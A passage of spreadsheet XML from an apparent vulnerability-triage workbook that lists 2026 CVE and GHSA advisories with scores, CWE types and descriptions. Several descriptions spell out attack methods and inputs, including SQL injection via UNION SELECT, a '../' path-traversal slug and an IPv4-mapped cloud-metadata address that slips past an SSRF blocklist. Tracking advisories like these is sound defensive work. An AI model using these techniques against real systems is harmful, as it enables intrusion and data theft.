          <t>NVD</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P258" s="5" t="inlineStr"/>
      <c r="Q258" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R258" s="5" t="inlineStr">
        <is>
          <t>siyuan versions before v3.8.2 contain an authenticated SQL injection vulnerability in the fullTextSearchBlock endpoint's method=1 query parameter. Attackers can inject UNION SELECT statements to read the entire blocks table, bypassing publish-access controls and exposing all document content and sensitive attributes.</t>
        </is>
      </c>
      <c r="S258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87807</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87808</t>
        </is>
      </c>
      <c r="D259" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E259" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F259" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr"/>
      <c r="K259" s="5" t="inlineStr"/>
      <c r="L259" s="5" t="inlineStr"/>
      <c r="M259" s="5" t="inlineStr"/>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P259" s="5" t="inlineStr"/>
      <c r="Q259" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R259" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions &lt;= 3.8.1 contain an incomplete fix for CVE-2026-32767 (GHSA-j7wh-x834-p3r7). The prior fix (commit d5e2d0bc) added an administrator check for SQL mode (method=2) in POST /api/search/fullTextSearchBlock, but the endpoint still does not enforce the application's read-only boundary: for method=2 it forwards caller-supplied SQL to the blocks database query path without calling model.CheckReadonly or CheckReadonlyStatementInBox. As a result, when a workspace runs in read-only mode (--readonly=true), an authenticated administrator can submit arbitrary SQL through /api/search/fullTextSearchBlock and obtain raw read access to the blocks database, even though the dedicated /api/query/sql endpoint is blocked in that mode. Fixed in v3.8.2.</t>
        </is>
      </c>
      <c r="S259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87808</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87816</t>
        </is>
      </c>
      <c r="D260" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E260" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F260" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr"/>
      <c r="K260" s="5" t="inlineStr"/>
      <c r="L260" s="5" t="inlineStr"/>
      <c r="M260" s="5" t="inlineStr"/>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P260" s="5" t="inlineStr"/>
      <c r="Q260" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R260" s="5" t="inlineStr">
        <is>
          <t>PasswordPusher before 2.11.1 contains a time-of-check-to-time-of-use race condition in view limit enforcement that allows unauthenticated attackers to bypass expire_after_views limits. Attackers can send concurrent requests to the show endpoint to access one-time secrets multiple times before the view count is incremented and the push expires.</t>
        </is>
      </c>
      <c r="S260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87816</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87817</t>
        </is>
      </c>
      <c r="D261" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E261" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F261" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr"/>
      <c r="K261" s="5" t="inlineStr">
        <is>
          <t>gitpython_project:gitpython</t>
        </is>
      </c>
      <c r="L261" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M261" s="5" t="inlineStr">
        <is>
          <t>3.1.60</t>
        </is>
      </c>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>NVD, OSV</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P261" s="5" t="inlineStr"/>
      <c r="Q261" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R261"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S261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87817</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87822</t>
        </is>
      </c>
      <c r="D262" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E262" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F262" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr"/>
      <c r="K262" s="5" t="inlineStr"/>
      <c r="L262" s="5" t="inlineStr"/>
      <c r="M262" s="5" t="inlineStr"/>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P262" s="5" t="inlineStr"/>
      <c r="Q262" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="R262" s="5" t="inlineStr">
        <is>
          <t>t-digest versions 3.1 through 3.3 fail to validate centroid means during deserialization in MergingDigest.fromBytes, allowing attackers to inject NaN values that bypass validation checks. Attackers can craft malicious serialized digests containing NaN centroids that degrade sorting performance from O(n log n) to O(n squared), causing severe processing delays during merge operations.</t>
        </is>
      </c>
      <c r="S262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87822</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87995</t>
        </is>
      </c>
      <c r="D263" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E263" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F263" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I263" s="5" t="inlineStr"/>
      <c r="J263" s="5" t="inlineStr"/>
      <c r="K263" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L263" s="5" t="inlineStr"/>
      <c r="M263" s="5" t="inlineStr"/>
      <c r="N263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O263" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P263" s="5" t="inlineStr"/>
      <c r="Q263" s="5" t="inlineStr">
        <is>
          <t>CWE-1021, CWE-79</t>
        </is>
      </c>
      <c r="R263" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.8.11 until 0.11.1, src/lib/components/chat/FileNav/PortPreview.svelte rendered terminal port content in an iframe sandbox containing both allow-scripts and allow-same-origin. Because the terminal proxy serves that content from the Open WebUI origin, an authenticated user with access to a shared terminal server could host script on a previewed port and take over a victim's account when the victim opened the preview. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87995</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>GHSA-rg7q-4223-phjw</t>
        </is>
      </c>
      <c r="D264" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E264" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F264" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="inlineStr"/>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr"/>
      <c r="K264" s="5" t="inlineStr"/>
      <c r="L264" s="5" t="inlineStr">
        <is>
          <t>composer:wwbn/avideo</t>
        </is>
      </c>
      <c r="M264" s="5" t="inlineStr"/>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr"/>
      <c r="P264" s="5" t="inlineStr"/>
      <c r="Q264" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R264" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-wprj-9cvc-5w37. This link is maintained to preserve external references.
### Original Description
AVideo through version 26.0 contains multiple unauthenticated list.json.php endpoints in payment plugins lacking authorization checks, exposing PayPal tokens, Authorize.Net webhooks, and Bitcoin transaction records. Unauthenticated attackers can retrieve all payment transaction data including agreement IDs, user financial records, and API responses via direct GET requests to vulnerable endpoints.</t>
        </is>
      </c>
      <c r="S264" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-rg7q-4223-phjw</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14962</t>
        </is>
      </c>
      <c r="D265" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E265" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F265" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr"/>
      <c r="K265" s="5" t="inlineStr"/>
      <c r="L265" s="5" t="inlineStr"/>
      <c r="M265" s="5" t="inlineStr"/>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P265" s="5" t="inlineStr"/>
      <c r="Q265" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R265" s="5" t="inlineStr">
        <is>
          <t>The ELEX WooCommerce Request a Quote WordPress plugin before 2.4.1 does not properly sanitise and escape a parameter before using it in a SQL query, allowing unauthenticated users to perform SQL injection attacks and extract arbitrary data from the database.</t>
        </is>
      </c>
      <c r="S265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14962</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19233</t>
        </is>
      </c>
      <c r="D266" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E266" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F266" s="5" t="inlineStr">
        <is>
          <t>cybersecurity@se.com</t>
        </is>
      </c>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I266" s="5" t="inlineStr"/>
      <c r="J266" s="5" t="inlineStr"/>
      <c r="K266" s="5" t="inlineStr"/>
      <c r="L266" s="5" t="inlineStr"/>
      <c r="M266" s="5" t="inlineStr"/>
      <c r="N266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O266" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P266" s="5" t="inlineStr"/>
      <c r="Q266" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R266" s="5" t="inlineStr">
        <is>
          <t>CWE-918: Server-Side Request Forgery (SSRF) vulnerability exists that could cause unauthorized command execution and disclosure of server data when an attacker with a privileged account sends crafted, unvalidated parameters to a server endpoint.</t>
        </is>
      </c>
      <c r="S266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19233</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26212</t>
        </is>
      </c>
      <c r="D267" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E267" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F267" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I267" s="5" t="inlineStr"/>
      <c r="J267" s="5" t="inlineStr"/>
      <c r="K267" s="5" t="inlineStr"/>
      <c r="L267" s="5" t="inlineStr"/>
      <c r="M267" s="5" t="inlineStr"/>
      <c r="N267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O267" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P267" s="5" t="inlineStr"/>
      <c r="Q267" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R267" s="5" t="inlineStr">
        <is>
          <t>Rara One Click Demo Import plugin for WordPress before 1.3.5 contains an arbitrary file upload vulnerability that allows authenticated attackers with Administrator privileges to upload arbitrary PHP files by passing a false value to wp_handle_upload() that disables WordPress core's file type validation checks across all three file parameters in the process_uploaded_files() function. Attackers can upload a malicious PHP file to the uploads directory and execute it over HTTP to achieve remote code execution in the web server process, with the uploaded file persisting on disk even after plugin deactivation and leaving no media library record to evade standard integrity checks.</t>
        </is>
      </c>
      <c r="S267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26212</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34741</t>
        </is>
      </c>
      <c r="D268" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E268" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F268" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I268" s="5" t="inlineStr"/>
      <c r="J268" s="5" t="inlineStr"/>
      <c r="K268" s="5" t="inlineStr"/>
      <c r="L268" s="5" t="inlineStr"/>
      <c r="M268" s="5" t="inlineStr"/>
      <c r="N268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O268" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P268" s="5" t="inlineStr"/>
      <c r="Q268" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R268" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, authentication bypass allows unauthenticated remote attackers to execute arbitrary PHP files from the env-production directory on a new iTop instance in the production environment. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34741</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47727</t>
        </is>
      </c>
      <c r="D269" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E269" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F269" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G269" s="5" t="inlineStr"/>
      <c r="H269" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I269" s="5" t="inlineStr"/>
      <c r="J269" s="5" t="inlineStr"/>
      <c r="K269" s="5" t="inlineStr"/>
      <c r="L269" s="5" t="inlineStr"/>
      <c r="M269" s="5" t="inlineStr"/>
      <c r="N269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O269" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P269" s="5" t="inlineStr"/>
      <c r="Q269" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="R269" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions prior to 0.104.0, the default-on "Safe import" filter fails to neutralize the shareTemplate relation because that relation is not marked as dangerous, allowing an attacker-supplied import archive to plant a server-side template that leads to remote code execution. The relation is omitted from the built-in list of dangerous attributes, so unlike other code-loading relations it is not disabled on import, and when the victim later publishes the imported note the public share renderer feeds the linked EJS code note's raw bytes into ejs.render, which compiles them in the server's Node process. An unauthenticated request to the shared note then executes the attacker's JavaScript with full access to require, process, the filesystem, and the network. This issue is fixed in version 0.104.0.</t>
        </is>
      </c>
      <c r="S269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47727</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49310</t>
        </is>
      </c>
      <c r="D270" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E270" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F270" s="5" t="inlineStr">
        <is>
          <t>psirt@huawei.com</t>
        </is>
      </c>
      <c r="G270" s="5" t="inlineStr"/>
      <c r="H270" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I270" s="5" t="inlineStr"/>
      <c r="J270" s="5" t="inlineStr"/>
      <c r="K270" s="5" t="inlineStr"/>
      <c r="L270" s="5" t="inlineStr"/>
      <c r="M270" s="5" t="inlineStr"/>
      <c r="N270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O270" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P270" s="5" t="inlineStr"/>
      <c r="Q270" s="5" t="inlineStr">
        <is>
          <t>CWE-264</t>
        </is>
      </c>
      <c r="R270" s="5" t="inlineStr">
        <is>
          <t>Permission control vulnerability in the event notification module.
Impact: Successful exploitation of this vulnerability may affect service confidentiality.</t>
        </is>
      </c>
      <c r="S270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49310</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50553</t>
        </is>
      </c>
      <c r="D271" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E271" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F271" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G271" s="5" t="inlineStr"/>
      <c r="H271" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I271" s="5" t="inlineStr"/>
      <c r="J271" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K271" s="5" t="inlineStr"/>
      <c r="L271" s="5" t="inlineStr"/>
      <c r="M271" s="5" t="inlineStr"/>
      <c r="N271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O271" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P271" s="5" t="inlineStr"/>
      <c r="Q271" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-22</t>
        </is>
      </c>
      <c r="R271" s="5" t="inlineStr">
        <is>
          <t>Note Mark is an open-source note-taking application. Prior to version 0.19.5, Note Mark validates book and note slug values with the OpenAPI/huma tag pattern:"[a-z0-9-]+". huma compiles this with regexp.MustCompile(s.Pattern) and tests it with patternRe.MatchString(str), an UNANCHORED match. Because the pattern is not anchored (^...$), any string that merely CONTAINS one [a-z0-9-] substring passes validation. A slug such as ../../../../../../tmp/escape is accepted and stored verbatim. The data-export CLI commands (note-mark migrate export and note-mark migrate export-v1) join these unsanitized slugs straight into the output path with path.Join / filepath.Join, then os.MkdirAll the directory and os.Create the note file. path.Join resolves the ../ segments, so the note content file is written OUTSIDE the configured export directory. The export process commonly runs as root (default in Docker / bare-metal admin usage), so this is a root-privilege arbitrary directory create + file write. This issue has been patched in version 0.19.5.</t>
        </is>
      </c>
      <c r="S271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50553</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52776</t>
        </is>
      </c>
      <c r="D272" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E272" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F272" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I272" s="5" t="inlineStr"/>
      <c r="J272" s="5" t="inlineStr"/>
      <c r="K272" s="5" t="inlineStr"/>
      <c r="L272" s="5" t="inlineStr"/>
      <c r="M272" s="5" t="inlineStr"/>
      <c r="N272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O272" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P272" s="5" t="inlineStr"/>
      <c r="Q272" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-918</t>
        </is>
      </c>
      <c r="R272" s="5" t="inlineStr">
        <is>
          <t>Compliance-trestle (Trestle) is a tooling platform for managing compliance as code. In versions before 3.12.4 and versions 4.0.0 through 4.0.3, the URLSecurityValidator that guards trestle's remote-fetch paths against server-side request forgery can be bypassed to reach loopback, link-local, cloud-metadata, and internal network endpoints it was designed to block. The blocklist does not canonicalize IPv4-mapped IPv6 literals such as [::ffff:169.254.169.254], which resolve to IPv6Address objects that never match the blocked IPv4 ranges, and it does not block the unspecified address 0.0.0.0, which routes to local services on Linux and inside containers. An attacker who can supply or influence an OSCAL artifact that trestle fetches, such as a malicious profile whose imports reference one of these bypass URLs, can cause the HTTPSFetcher and SFTPFetcher paths to contact cloud instance-metadata services, loopback interfaces, or internal hosts. This issue is fixed in versions 3.12.4 and 4.1.0.</t>
        </is>
      </c>
      <c r="S272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52776</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54511</t>
        </is>
      </c>
      <c r="D273" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E273" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F273" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I273" s="5" t="inlineStr"/>
      <c r="J273" s="5" t="inlineStr"/>
      <c r="K273" s="5" t="inlineStr"/>
      <c r="L273" s="5" t="inlineStr"/>
      <c r="M273" s="5" t="inlineStr"/>
      <c r="N273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O273" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P273" s="5" t="inlineStr"/>
      <c r="Q273" s="5" t="inlineStr">
        <is>
          <t>CWE-117, CWE-93</t>
        </is>
      </c>
      <c r="R273" s="5" t="inlineStr">
        <is>
          <t>LogTape is an unobtrusive logging library. Prior to 1.3.11, 2.0.14, and 2.1.5, the @logtape/syslog package's escapeStructuredDataValue() function in packages/syslog/src/syslog.ts does not neutralize C0 control characters from U+0000 through U+001F in structured data values, and formatStructuredData() inserts property keys without validating the RFC 5424 SD-NAME grammar. When includeStructuredData is true, an attacker-controlled newline can terminate an RFC 6587 non-transparent TCP syslog frame and make following bytes appear as a forged RFC 5424 record, while a key containing a closing bracket or other forbidden character can terminate or corrupt the structured-data element. Applications that forward attacker-controlled property values or keys can therefore allow forged records with arbitrary hosts, applications, process identifiers, facilities, or severity levels, undermining downstream collector and SIEM integrity. This issue is fixed in versions 1.3.11, 2.0.14, and 2.1.5.</t>
        </is>
      </c>
      <c r="S273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54511</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55182</t>
        </is>
      </c>
      <c r="D274" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E274" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F274" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
